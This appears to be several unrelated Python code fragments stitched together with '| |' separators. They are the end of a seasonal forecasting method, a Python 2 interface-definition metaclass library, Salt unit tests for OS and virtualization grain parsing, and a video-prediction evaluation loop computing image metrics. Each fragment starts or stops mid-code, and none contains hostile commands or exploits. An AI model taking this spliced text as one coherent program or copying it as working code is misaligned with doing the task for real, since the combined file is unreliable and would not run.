if just_point_forecast == True, a dataframe of point forecasts
"""
predictStartTime = datetime.datetime.now()
tile_len = len(self.tile_values_lag_1.index)
df = pd.DataFrame(
np.tile(
self.tile_values_lag_1, (int(np.ceil(forecast_length / tile_len)), 1)
)[0:forecast_length],
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
if str(self.lag_2).isdigit():
y = pd.DataFrame(
np.tile(
self.tile_values_lag_2,
(
int(
np.ceil(forecast_length / len(self.tile_values_lag_2.index))
),
1,
),
)[0:forecast_length],
columns=self.column_names,
index=self.create_forecast_index(forecast_length=forecast_length),
)
df = (df + y) | |
#=======================================================================
__version__ = '''0.2.37'''
__sub_version__ = '''20071006153421'''
__copyright__ = '''(c) <NAME> 2003'''
#-----------------------------------------------------------------------
__doc__ = '''\
This module defines an interface definition and enforcement mechanism and
classes.
'''
#-----------------------------------------------------------------------
import inspect
import types
import sys
import pli.functional as func
import pli.logictypes as logictypes
import pli.pattern.mixin.mapping as mapping
#-----------------------------------------------------------------------
# TODO make it possible to change the __implements__ attr name...
# TODO write an InterfaceUnion class.... (e.g. an interface composed of
# several interfaces, that will support the "interface" interface)
#
#
#------------------------------------------------------InterfaceError---
# TODO docs!!
class InterfaceError(Exception):
'''
'''
pass
#-----------------------------------------------------------------------
#-----------------------------------------------------_BasicInterface---
class _BasicInterface(type, mapping.Mapping):
'''
the interface metaclass.
this defines the basic functionality:
- dict-like class interface.
- 'LIKE' special prop handling.
'''
# this will define the interface format...
__format__ = None
# this if False will prevent the modification of the interface
# after it's definition... (default: False)
__interface_writable__ = False
# this if True will enable element deletion from base interfaces if
# it was not defined locally... (default: False)
__contagious_delete__ = False
# WARNING: do not change this unless you know what you are doing!
__attribute_properties__ = (
# special options...
'LIKE',
)
def __init__(cls, name, bases, ns):
'''
'''
# sanity checks....
if not hasattr(cls, '__format__'):
raise InterfaceError, 'interface %s does not have a format defined.' % cls
# check consistency...
errs = []
if not cls.__isconsistent__(errs):
errs[:] = dict.fromkeys([ e.__class__.__name__ + ': '+ str(e) for e in errs ]).keys()
raise InterfaceError, 'inconsistent interface definition for %s in:\n %s.' % (cls, '\n '.join(errs))
super(_BasicInterface, cls).__init__(name, bases, ns)
# mapping specific:
def __getitem__(cls, name):
'''
'''
try:
return cls.getattrproperty(name)
except TypeError:
## ##!! is this needed???
## try:
## return super(_BasicInterface, cls).__getitem__(name)
## except:
## raise KeyError, str(name)
raise KeyError, str(name)
def __setitem__(cls, name, value):
'''
NOTE: this will only modify the current class (no base interface will change).
'''
if hasattr(cls, '__interface_writable__') and not cls.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % cls
if value == None and cls._isdependedon(name):
raise InterfaceError, 'can\'t shadow attr %s due to "LIKE" dependencies.' % name
if '__format__' in cls.__dict__ and cls.__format__ != None:
cls.__format__[name] = value
return
cls.__format__ = {name: value}
def __delitem__(cls, name):
'''
'''
if hasattr(cls, '__interface_writable__') and not cls.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % cls
if name in cls:
# if name is not local to this interface...
if ('__format__' not in cls.__dict__ or name not in cls.__dict__['__format__']) \
and (not hasattr(cls, '__contagious_delete__') or not cls.__contagious_delete__):
raise InterfaceError, 'the interface %s is not modifiable.' % cls
#
if cls._isdependedon(name):
raise InterfaceError, 'can\'t remove attr %s due to "LIKE" dependencies.' % name
# delete...
# this is safe as-is as we get here in two cases:
# 1. the name is local
# 2. we can delete the name form its container...
try:
del cls.__format__[name]
except KeyError:
for c in cls.__mro__[1:]:
if hasattr(c, '__format__') \
and c.__format__ != None \
and name in c.__format__:
if hasattr(c, '__interface_writable__') and not c.__interface_writable__:
raise InterfaceError, 'the interface %s is not modifiable.' % c
del c.__format__[name]
return
else:
raise KeyError, str(name)
def __contains__(cls, name):
'''
'''
try:
if cls._getrealprops(name) == None:
return False
return True
except:
## ##!! is this needed???
## try:
## return super(_BasicInterface, cls).__contains__(name)
## except:
## raise KeyError, str(name)
return False
def __iter__(cls):
'''
'''
visited = []
for c in cls.__mro__:
if hasattr(c, '__format__') \
and c.__format__ != None:
for k, v in c.__format__.iteritems():
# ignore visited or hidden items...
if k in visited:
continue
if v == None:
visited += [k]
continue
visited += [k]
yield k
# interface specific (1st generation):
def __isconsistent__(cls, errors=None):
'''
'''
err = None
if errors != None:
err = []
allowed_props = cls.__attribute_properties__
for name in cls:
try:
props = cls.getattrproperty(name)
for n in props:
if n not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % n
except KeyError, e:
if cls._getrealprops(name) != None:
if err != None:
err += [e]
else:
return False
except Exception, e:
if err != None:
err += [e]
else:
return False
if err in ([], None):
return True
errors.extend(err)
return False
def _isdependedon(cls, name):
'''
this will return true if the name is single occuring (not None) and at least
one "LIKE" prop points at it.
NOTE: the result this returns is relative to the first occurance of name.
'''
lst = list(cls._realpropiter(name))
# check if we have a LIKE prop depending on this name...
if name in cls and len([ i for i in lst if i != None ]) < 2:
if len(lst) > 1 and lst[0] == None:
return False
# we need to search... (this might be slow!)
for c in cls.__mro__:
try:
for d in c.__format__.itervalues():
## if d != None and 'LIKE' in d and d['LIKE'] == name:
if d != None and d.get('LIKE', None) == name:
return True
except AttributeError:
pass
return False
def _realpropiter(cls, name):
'''
'''
if not hasattr(cls, '__format__'):
raise InterfaceError, 'interface %s does not have a format defined.' % cls
format = cls.__format__
for c in cls.__mro__:
## ##!!! REVISE: BEGIN TUKAN HACK
## # XXX We should go by mro to object, or try to stop earlier?
## if type(c) == type:
## return
## ##!!! we do not know anthing about like on this level...
## ##raise InterfaceError, 'LIKE argument "%s" is not found in the interface' % (name)
## ##!!! REVISE: END TUKAN HACK
if hasattr(c, '__format__') \
and c.__format__ != None \
and name in c.__format__:
##!!! process the 'LIKE' option...
yield c.__format__[name]
def _getrealprops(cls, name):
'''
this will return the real option dict for the attr (as defined in the __format__).
NOTE: if the attr is nod defined in the current class it will be searched in the mro.
'''
try:
return cls._realpropiter(name).next()
except StopIteration:
raise KeyError, name
def getattrproperty(cls, name, prop=None):
'''
returns:
None : if prop is given but not found.
val : if prop is given and found (might also be None).
dict : if name is found and prop not given.
NOTE: if a property is not defined for the attr None will be
returned (this is the same as if its value was None).
'''
##!! REVISE !!##
allowed_props = cls.__attribute_properties__ + (None,)
if prop not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % prop
if name not in cls:
if '*' in cls and cls['*'] != None:
res = {}
else:
raise KeyError, name
else:
res = cls._getrealprops(name)
res = res.copy()
# resolve the 'LIKE' prop...
visited = [res]
##!!! WRITTEN BY 2kan (2kan)
we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS \
= None
while 'LIKE' in res:
if type(res['LIKE']) is str:
## ext_format = cls._getrealprops(res['LIKE']).copy()
for fmt in cls._realpropiter(res['LIKE']):
if fmt != None:
ext_format = fmt.copy()
break
elif type(res['LIKE']) is dict:
ext_format = res['LIKE'].copy()
else:
raise TypeError, 'the argument of "LIKE" attribute option must '\
'either be of type str or dict (got: %s).' % type(res['LIKE'])
## if res['LIKE'] == name or ext_format in visited:
##!!! WRITTEN BY 2kan (+11)
if res['LIKE'] == name or \
res['LIKE'] == we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS:
temp = 1
for fmt in cls._realpropiter(res['LIKE']):
# NOTE: We always need to do one iteration to go to
# the upper level in mro.
if temp == 1:
temp = 0
continue
if fmt != None:
ext_format = fmt.copy()
break
if ext_format in visited:
# check for conflicts in the chain.... (a conflict is
# when a name is present more than once with different
# values).
v = visited[0]
# XXX is there a better way to do this??? (use sets???)
for d in visited[1:]:
for k in d:
if k != 'LIKE' and k in v and d[k] != v[k]:
raise InterfaceError, 'LIKE loop conflict in %s for attribute "%s".' % (cls, name)
if k not in allowed_props:
raise InterfaceError, 'unknown option "%s".' % k
v[k] = d[k]
del res['LIKE']
break
we_was_in___this_var_was_writtern_by_2kan__thus_I_have_no_idea_what_it_means____RANAME_AS_SOON_AS_POSSIBLE_TO_FIGURE_OUT_THE_ACTUAL_SEMANTICS \
= res['LIKE']
visited += [ext_format.copy()]
del res['LIKE']
ext_format.update(res)
# revise...
## res = ext_format
res.update(ext_format)
if prop != None:
if prop in res:
return res[prop]
else:
## raise InterfaceError, 'property "%s" is not defined for attr "%s".' % (prop, name)
return None
return res
#----------------------------------------------------------_Interface---
# TODO docs!!
class _Interface(_BasicInterface):
'''
'''
# WARNING: do not change this unless you know what you are doing!
__attribute_properties__ = _BasicInterface.__attribute_properties__ + (
'type',
'default',
'predicate',
'essential',
'doc',
'handler',
'readable',
'writable',
'deleteable',
)
# interface methods (2nd generation):
# TODO exception safe??????
def isessential(cls, name):
'''
'''
return cls.getattrproperty(name, 'essential') == True
def isreadable(cls, name):
'''
'''
return cls.getattrproperty(name, 'readable') in (True, None)
def iswritable(cls, name):
'''
'''
return cls.getattrproperty(name, 'writable') in (True, None)
def isdeletable(cls, name):
'''
'''
return cls.getattrproperty(name, 'deleteable') in (True, None) \
and cls.getattrproperty(name, 'essential') != True
#-----------------------------------------------------------Interface---
# Q: how wil the user based ACL be added??
class Interface(object):
'''
this is the basic interface class.
this provides a basic mechanism to define object attribute format.
NOTE: this only provides meens to define attribute format, as
methods are also attributes they can be checked using the
predicate mechanism.
NOTE: if the value of the attr key is None, the attr will be
invisible.
the attribute definition format is as follows:
{
<attr-name> :
{
<opt-name>: <opt-value>
[...]
}
[...]
}
supported options:
type - value type or superclass.
default - this is the default value of the option.
predicate - this will get the option value as argument and
test its compliance (if this will return False
InterfaceError will be raised).
essential - this if true will guarantee the options'
existence in the created object.
doc - this is the attr documentation
handler - this is the alternative attribute handler.
this will take the object, attr name and attr
value as arguments and its' return will replace
the original value.
NOTE: if the 'default' option is set it WILL get
filtered through the handler.
NOTE: this can be called when the object is not
fully initialized, thus no assumptions about
object state should be made.
for instance this will happen for
pli.interface.objects.ObjectWithInterface if
both the handler and the default value are
defined.
| |
Server 12 SP1',
'ID': 'sles',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:suse:sles:12:sp1'
},
}
expectation = {
'oscodename': 'SUSE Linux Enterprise Server 12 SP1',
'osfullname': "SLES",
'osrelease': '12.1',
'osrelease_info': (12, 1),
'osmajorrelease': 12,
'osfinger': 'SLES-12',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_suse_os_grains_opensuse_leap_42_1(self):
'''
Test if OS grains are parsed correctly in openSUSE Leap 42.1
'''
_os_release_map = {
'os_release_file': {
'NAME': 'openSUSE Leap',
'VERSION': '42.1',
'VERSION_ID': '42.1',
'PRETTY_NAME': 'openSUSE Leap 42.1 (x86_64)',
'ID': 'opensuse',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:opensuse:opensuse:42.1'
},
}
expectation = {
'oscodename': 'openSUSE Leap 42.1 (x86_64)',
'osfullname': "Leap",
'osrelease': '42.1',
'osrelease_info': (42, 1),
'osmajorrelease': 42,
'osfinger': 'Leap-42',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_suse_os_grains_tumbleweed(self):
'''
Test if OS grains are parsed correctly in openSUSE Tumbleweed
'''
_os_release_map = {
'os_release_file': {
'NAME': 'openSUSE',
'VERSION': 'Tumbleweed',
'VERSION_ID': '20160504',
'PRETTY_NAME': 'openSUSE Tumbleweed (20160504) (x86_64)',
'ID': 'opensuse',
'ANSI_COLOR': '0;32',
'CPE_NAME': 'cpe:/o:opensuse:opensuse:20160504'
},
}
expectation = {
'oscodename': 'openSUSE Tumbleweed (20160504) (x86_64)',
'osfullname': "Tumbleweed",
'osrelease': '20160504',
'osrelease_info': (20160504,),
'osmajorrelease': 20160504,
'osfinger': 'Tumbleweed-20160504',
}
self._run_suse_os_grains_tests(_os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_7_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 7 "wheezy"
'''
_os_release_map = {
'linux_distribution': ('debian', '7.11', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'wheezy',
'osfullname': 'Debian GNU/Linux',
'osrelease': '7',
'osrelease_info': (7,),
'osmajorrelease': 7,
'osfinger': 'Debian-7',
}
self._run_os_grains_tests("debian-7", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_8_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 8 "jessie"
'''
_os_release_map = {
'linux_distribution': ('debian', '8.10', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'jessie',
'osfullname': 'Debian GNU/Linux',
'osrelease': '8',
'osrelease_info': (8,),
'osmajorrelease': 8,
'osfinger': 'Debian-8',
}
self._run_os_grains_tests("debian-8", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_debian_9_os_grains(self):
'''
Test if OS grains are parsed correctly in Debian 9 "stretch"
'''
_os_release_map = {
'linux_distribution': ('debian', '9.3', ''),
}
expectation = {
'os': 'Debian',
'os_family': 'Debian',
'oscodename': 'stretch',
'osfullname': 'Debian GNU/Linux',
'osrelease': '9',
'osrelease_info': (9,),
'osmajorrelease': 9,
'osfinger': 'Debian-9',
}
self._run_os_grains_tests("debian-9", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_ubuntu_xenial_os_grains(self):
'''
Test if OS grains are parsed correctly in Ubuntu 16.04 "Xenial Xerus"
'''
_os_release_map = {
'linux_distribution': ('Ubuntu', '16.04', 'xenial'),
}
expectation = {
'os': 'Ubuntu',
'os_family': 'Debian',
'oscodename': 'xenial',
'osfullname': 'Ubuntu',
'osrelease': '16.04',
'osrelease_info': (16, 4),
'osmajorrelease': 16,
'osfinger': 'Ubuntu-16.04',
}
self._run_os_grains_tests("ubuntu-16.04", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_ubuntu_artful_os_grains(self):
'''
Test if OS grains are parsed correctly in Ubuntu 17.10 "<NAME>"
'''
_os_release_map = {
'linux_distribution': ('Ubuntu', '17.10', 'artful'),
}
expectation = {
'os': 'Ubuntu',
'os_family': 'Debian',
'oscodename': 'artful',
'osfullname': 'Ubuntu',
'osrelease': '17.10',
'osrelease_info': (17, 10),
'osmajorrelease': 17,
'osfinger': 'Ubuntu-17.10',
}
self._run_os_grains_tests("ubuntu-17.10", _os_release_map, expectation)
@skipIf(not salt.utils.platform.is_windows(), 'System is not Windows')
def test_windows_platform_data(self):
'''
Test the _windows_platform_data function
'''
grains = ['biosversion', 'kernelrelease', 'kernelversion',
'manufacturer', 'motherboard', 'osfullname', 'osmanufacturer',
'osrelease', 'osservicepack', 'osversion', 'productname',
'serialnumber', 'timezone', 'virtual', 'windowsdomain',
'windowsdomaintype']
returned_grains = core._windows_platform_data()
for grain in grains:
self.assertIn(grain, returned_grains)
valid_types = ['Unknown', 'Unjoined', 'Workgroup', 'Domain']
self.assertIn(returned_grains['windowsdomaintype'], valid_types)
valid_releases = ['Vista', '7', '8', '8.1', '10', '2008Server',
'2008ServerR2', '2012Server', '2012ServerR2',
'2016Server', '2019Server']
self.assertIn(returned_grains['osrelease'], valid_releases)
def test__windows_os_release_grain(self):
versions = {
'Windows 10 Home': '10',
'Windows 10 Pro': '10',
'Windows 10 Pro for Workstations': '10',
'Windows 10 Pro Education': '10',
'Windows 10 Enterprise': '10',
'Windows 10 Enterprise LTSB': '10',
'Windows 10 Education': '10',
'Windows 10 IoT Core': '10',
'Windows 10 IoT Enterprise': '10',
'Windows 10 S': '10',
'Windows 8.1': '8.1',
'Windows 8.1 Pro': '8.1',
'Windows 8.1 Enterprise': '8.1',
'Windows 8.1 OEM': '8.1',
'Windows 8.1 with Bing': '8.1',
'Windows 8': '8',
'Windows 8 Pro': '8',
'Windows 8 Enterprise': '8',
'Windows 8 OEM': '8',
'Windows 7 Starter': '7',
'Windows 7 Home Basic': '7',
'Windows 7 Home Premium': '7',
'Windows 7 Professional': '7',
'Windows 7 Enterprise': '7',
'Windows 7 Ultimate': '7',
'Windows Thin PC': 'Thin',
'Windows Vista Starter': 'Vista',
'Windows Vista Home Basic': 'Vista',
'Windows Vista Home Premium': 'Vista',
'Windows Vista Business': 'Vista',
'Windows Vista Enterprise': 'Vista',
'Windows Vista Ultimate': 'Vista',
'Windows Server 2019 Essentials': '2019Server',
'Windows Server 2019 Standard': '2019Server',
'Windows Server 2019 Datacenter': '2019Server',
'Windows Server 2016 Essentials': '2016Server',
'Windows Server 2016 Standard': '2016Server',
'Windows Server 2016 Datacenter': '2016Server',
'Windows Server 2012 R2 Foundation': '2012ServerR2',
'Windows Server 2012 R2 Essentials': '2012ServerR2',
'Windows Server 2012 R2 Standard': '2012ServerR2',
'Windows Server 2012 R2 Datacenter': '2012ServerR2',
'Windows Server 2012 Foundation': '2012Server',
'Windows Server 2012 Essentials': '2012Server',
'Windows Server 2012 Standard': '2012Server',
'Windows Server 2012 Datacenter': '2012Server',
'Windows MultiPoint Server 2012': '2012Server',
'Windows Small Business Server 2011': '2011Server',
'Windows MultiPoint Server 2011': '2011Server',
'Windows Home Server 2011': '2011Server',
'Windows MultiPoint Server 2010': '2010Server',
'Windows Server 2008 R2 Foundation': '2008ServerR2',
'Windows Server 2008 R2 Standard': '2008ServerR2',
'Windows Server 2008 R2 Enterprise': '2008ServerR2',
'Windows Server 2008 R2 Datacenter': '2008ServerR2',
'Windows Server 2008 R2 for Itanium-based Systems': '2008ServerR2',
'Windows Web Server 2008 R2': '2008ServerR2',
'Windows Storage Server 2008 R2': '2008ServerR2',
'Windows HPC Server 2008 R2': '2008ServerR2',
'Windows Server 2008 Standard': '2008Server',
'Windows Server 2008 Enterprise': '2008Server',
'Windows Server 2008 Datacenter': '2008Server',
'Windows Server 2008 for Itanium-based Systems': '2008Server',
'Windows Server Foundation 2008': '2008Server',
'Windows Essential Business Server 2008': '2008Server',
'Windows HPC Server 2008': '2008Server',
'Windows Small Business Server 2008': '2008Server',
'Windows Storage Server 2008': '2008Server',
'Windows Web Server 2008': '2008Server'
}
for caption in versions:
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(
version,
versions[caption],
'version: {0}\n'
'found: {1}\n'
'caption: {2}'.format(version, versions[caption], caption)
)
embedded_versions = {
'Windows Embedded 8.1 Industry Pro': '8.1',
'Windows Embedded 8 Industry Pro': '8',
'Windows POSReady 7': '7',
'Windows Embedded Standard 7': '7',
'Windows Embedded POSReady 2009': '2009',
'Windows Embedded Standard 2009': '2009',
'Windows XP Embedded': 'XP',
}
for caption in embedded_versions:
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(
version,
embedded_versions[caption],
'{0} != {1}\n'
'version: {0}\n'
'found: {1}\n'
'caption: {2}'.format(version, embedded_versions[caption], caption)
)
# Special Cases
# Windows Embedded Standard is Windows 7
caption = 'Windows Embedded Standard'
with patch('platform.release', MagicMock(return_value='7')):
version = core._windows_os_release_grain(caption, 1)
self.assertEqual(version, '7')
@skipIf(not salt.utils.platform.is_linux(), 'System is not Linux')
def test_linux_memdata(self):
'''
Test memdata on Linux systems
'''
_proc_meminfo = textwrap.dedent('''\
MemTotal: 16277028 kB
SwapTotal: 4789244 kB''')
with patch('salt.utils.files.fopen', mock_open(read_data=_proc_meminfo)):
memdata = core._linux_memdata()
self.assertEqual(memdata.get('mem_total'), 15895)
self.assertEqual(memdata.get('swap_total'), 4676)
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_bsd_memdata(self):
'''
Test to memdata on *BSD systems
'''
_path_exists_map = {}
_path_isfile_map = {}
_cmd_run_map = {
'freebsd-version -u': '10.3-RELEASE',
'/sbin/sysctl -n hw.physmem': '2121781248',
'/sbin/sysctl -n vm.swap_total': '419430400'
}
path_exists_mock = MagicMock(side_effect=lambda x: _path_exists_map[x])
path_isfile_mock = MagicMock(
side_effect=lambda x: _path_isfile_map.get(x, False)
)
cmd_run_mock = MagicMock(
side_effect=lambda x: _cmd_run_map[x]
)
empty_mock = MagicMock(return_value={})
mock_freebsd_uname = ('FreeBSD',
'freebsd10.3-hostname-8148',
'10.3-RELEASE',
'FreeBSD 10.3-RELEASE #0 r297264: Fri Mar 25 02:10:02 UTC 2016 <EMAIL>:/usr/obj/usr/src/sys/GENERIC',
'amd64',
'amd64')
with patch('platform.uname',
MagicMock(return_value=mock_freebsd_uname)):
with patch.object(salt.utils.platform, 'is_linux',
MagicMock(return_value=False)):
with patch.object(salt.utils.platform, 'is_freebsd',
MagicMock(return_value=True)):
# Skip the first if statement
with patch.object(salt.utils.platform, 'is_proxy',
MagicMock(return_value=False)):
# Skip the init grain compilation (not pertinent)
with patch.object(os.path, 'exists', path_exists_mock):
with patch('salt.utils.path.which') as mock:
mock.return_value = '/sbin/sysctl'
# Make a bunch of functions return empty dicts,
# we don't care about these grains for the
# purposes of this test.
with patch.object(
core,
'_bsd_cpudata',
empty_mock):
with patch.object(
core,
'_hw_data',
empty_mock):
with patch.object(
core,
'_virtual',
empty_mock):
with patch.object(
core,
'_ps',
empty_mock):
# Mock the osarch
with patch.dict(
core.__salt__,
{'cmd.run': cmd_run_mock}):
os_grains = core.os_data()
self.assertEqual(os_grains.get('mem_total'), 2023)
self.assertEqual(os_grains.get('swap_total'), 400)
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_docker_virtual(self):
'''
Test if virtual grains are parsed correctly in Docker.
'''
with patch.object(os.path, 'isdir', MagicMock(return_value=False)):
with patch.object(os.path,
'isfile',
MagicMock(side_effect=lambda x: True if x == '/proc/1/cgroup' else False)):
for cgroup_substr in (':/system.slice/docker', ':/docker/',
':/docker-ce/'):
cgroup_data = \
'10:memory{0}a_long_sha256sum'.format(cgroup_substr)
log.debug(
'Testing Docker cgroup substring \'%s\'', cgroup_substr)
with patch('salt.utils.files.fopen', mock_open(read_data=cgroup_data)):
with patch.dict(core.__salt__, {'cmd.run_all': MagicMock()}):
grains = core._virtual({'kernel': 'Linux'})
self.assertEqual(
grains.get('virtual_subtype'),
'Docker'
)
self.assertEqual(
grains.get('virtual'),
'container',
)
@skipIf(salt.utils.platform.is_windows(), 'System is Windows')
def test_lxc_virtual(self):
'''
Test if virtual grains are parsed correctly in LXC.
'''
with patch.object(os.path, 'isdir', MagicMock(return_value=False)):
with patch.object(os.path,
'isfile',
MagicMock(side_effect=lambda x: True if x == '/proc/1/cgroup' else False)):
cgroup_data = '10:memory:/lxc/a_long_sha256sum'
with patch('salt.utils.files.fopen', mock_open(read_data=cgroup_data)):
with patch.dict(core.__salt__, {'cmd.run_all': MagicMock()}):
grains = core._virtual({'kernel': 'Linux'})
self.assertEqual(
grains.get('virtual_subtype'),
'LXC'
)
| |
and self.config["testing"]["metrics_on_patches"]:
x_seq_hat = get_patches(x_seq_hat,weights,self.config["data"],test_dataset.weight_value_flow, logger=self.logger)
x_seq_gt = get_patches(x_seq_gt, weights, self.config["data"], test_dataset.weight_value_flow, logger=self.logger)
sigmas_gt = []
ll_loss_dyn = []
rec_imgs = []
for n in range(seq_len):
x_hat_tn, s_tn, *_ = net(x_seq_gt[:, n], x_seq_gt[:, n], poke, len=0)
sigmas_gt.append(s_tn)
rec_imgs.append(x_hat_tn)
ll_dyn_n = vgg_loss_agg(self.vgg, x_seq_gt[:, n], x_seq_hat[:, n])
ll_loss_dyn.append(ll_dyn_n)
ll_loss_tk_eval = torch.stack(ll_loss_dyn,dim=0).mean()
rec_imgs = torch.stack(rec_imgs,1)
if self.use_norm_loss:
poke_norms = []
for p in poke:
magns = p.norm(dim=0)
ids = magns.nonzero(as_tuple=True)
if ids[0].shape[0] > 0:
poke_norms.append(magns[ids].mean().unsqueeze(0))
else:
poke_norms.append(torch.zeros(1).cuda(self.all_devices[0]))
poke_norms = torch.cat(poke_norms, 0)
norm_loss = ((poke_norms - mu_delta.reshape(poke_norms.shape[0], -1).norm(dim=-1)) ** 2).mean()
out_dict.update({"norm_loss": norm_loss.item()})
if weights is not None and self.config["testing"]["metrics_on_patches"]:
rec_imgs = get_patches(rec_imgs, weights, self.config["data"], test_dataset.weight_value_flow, logger=self.logger)
# apply inception model for fid calculation at time t+k
for t in range(x_seq_gt.shape[1]):
real_features_t = self.inception_model(x_seq_gt[:, t]).cpu().numpy()
fake_features_t = self.inception_model(x_seq_hat[:, t]).cpu().numpy()
if t not in self.fid_feats_fake_per_frame:
self.fid_feats_fake_per_frame.update({t: fake_features_t})
self.fid_feats_real_per_frame.update({t: real_features_t})
else:
self.fid_feats_fake_per_frame[t] = np.concatenate([self.fid_feats_fake_per_frame[t], fake_features_t], axis=0)
self.fid_feats_real_per_frame[t] = np.concatenate([self.fid_feats_real_per_frame[t], real_features_t], axis=0)
# evaluate training losses
# ll_loss_tk_eval = vgg_loss_agg(self.vgg, x_tk, x_tk_hat)
ll_loss_t_i_eval = vgg_loss_agg(self.vgg, x_t, x_t_hat)
dyn_losses = []
for s_tk, s_hat_tk in zip(sigmas_gt, sigmas_hat):
dyn_losses.append(latent_dynamics_loss(s_hat_tk, s_tk, []))
latent_loss_dyn_eval = torch.stack(dyn_losses).mean()
out_dict.update({"vgg_loss_dyn_eval": ll_loss_tk_eval.item(), "loss_dis_i_eval": ll_loss_t_i_eval.item(), "latent_loss_dyn_eval": latent_loss_dyn_eval.item()})
#if self.pixel_decoder_loss:
#x_t_hat_dec = net.dec(sigma_t, alpha)
#loss_dec_dyn = (vgg_loss_agg(self.vgg, x_t_hat_dec, x_tk_hat) - vgg_loss_agg(self.vgg, x_t, x_tk)) ** 2
loss_dec_dyn = []
for n in range(seq_len - 1):
loss_dec_dyn_tn = pixel_dynamics_loss(x_seq_gt[:, n], x_seq_gt[:, n + 1], rec_imgs[:,n], x_seq_hat[:, n + 1])
loss_dec_dyn.append(loss_dec_dyn_tn)
loss_dec_dyn = torch.stack(loss_dec_dyn, dim=0).mean()
out_dict.update({"pixel_loss_dec_eval": loss_dec_dyn.item()})
# compute metrics
ssim_t = ssim_lightning(x_t, x_t_hat)
psnr_t = psnr_lightning(x_t, x_t_hat)
lpips_t = metric_lpips(x_t,x_t_hat, self.lpips_fn, reduce=False)
ssim_tk, ssim_per_frame = ssim_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
psnr_tk, psnr_per_frame = psnr_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
lpips_avg, lpips_per_frame = metric_lpips(x_seq_gt, x_seq_hat,self.lpips_fn,reduce=False,return_per_frame=True)
# ssim_pl, ssim_pl_per_frame = ssim_lightning(x_seq_gt,x_seq_hat,return_per_frame=True)
# psnr_pl, psnr_pl_per_frame = psnr_lightning(x_seq_gt, x_seq_hat, return_per_frame=True)
# append to arrays
self.lpips["t"].append(lpips_t)
self.psnrs["t"].append(psnr_t)
self.ssims["t"].append(ssim_t)
self.psnrs["tk"].append(psnr_tk)
self.ssims["tk"].append(ssim_tk)
self.lpips["tk"].append(lpips_avg)
#self.ssims["pl"].append(ssim_pl)
#self.psnrs["pl"].append(psnr_pl)
# append the values of the respective sequence length
[self.ssims_per_frame[key].append(ssim_per_frame[key]) if key in self.ssims_per_frame else self.ssims_per_frame.update({key:[ssim_per_frame[key]]}) for key in ssim_per_frame]
[self.psnrs_per_frame[key].append(psnr_per_frame[key]) if key in self.psnrs_per_frame else self.psnrs_per_frame.update({key:[psnr_per_frame[key]]}) for key in psnr_per_frame]
[self.lpips_per_frame[key].append(lpips_per_frame[key]) if key in self.lpips_per_frame else self.lpips_per_frame.update({key:[lpips_per_frame[key]]}) for key in lpips_per_frame]
#[self.ssims_per_frame_pl[key].append(ssim_pl_per_frame[key]) if key in self.ssims_per_frame_pl else self.ssims_per_frame_pl.update({key: [ssim_pl_per_frame[key]]}) for key in ssim_pl_per_frame]
#[self.psnrs_per_frame_pl[key].append(psnr_pl_per_frame[key]) if key in self.psnrs_per_frame_pl else self.psnrs_per_frame_pl.update({key: [psnr_pl_per_frame[key]]}) for key in psnr_pl_per_frame]
return out_dict
# test_it steps are performed while generating test_imgs, there n_test_img is overall number divided by number of test iterations
n_test_img = int(self.config["testing"]["n_test_img"] // self.config["testing"]["test_it"])
def eval_visual(engine, eval_batch):
net.eval()
with torch.no_grad():
# prepare data
if test_dataset.flow_weights:
poke = eval_batch["poke"][0].cuda(self.all_devices[0])
weights = eval_batch["poke"][1]
else:
poke = eval_batch["poke"].cuda(self.all_devices[0])
x_t = eval_batch["images"][:, 0].cuda(self.all_devices[0])
x_seq_gt = eval_batch["images"][:, 1:].cuda(self.all_devices[0])
flow = eval_batch["flow"]
if self.config["architecture"]["disentanglement"]:
shape_img = eval_batch["img_aT"].cuda(self.all_devices[0])
else:
shape_img = x_t
seq_len = x_seq_gt.shape[1]
x_seq_hat, *_ = net(x_t,x_t, poke, len=seq_len)
x_t_hat , *_ = net(x_seq_gt[:,-1],shape_img,poke,len=0)
grid_dis = make_img_grid(x_seq_gt[:,-1],shape_img, x_t_hat,x_t, n_logged=n_test_img)
grid_dyn = make_flow_grid(x_t, poke, x_seq_hat[:,-1], x_seq_gt[:,-1], n_logged=n_test_img, flow=flow)
seq_vis_hat = torch.cat([x_t.unsqueeze(1), x_seq_hat], 1)
seq_vis_gt = torch.cat([x_t.unsqueeze(1), x_seq_gt], 1)
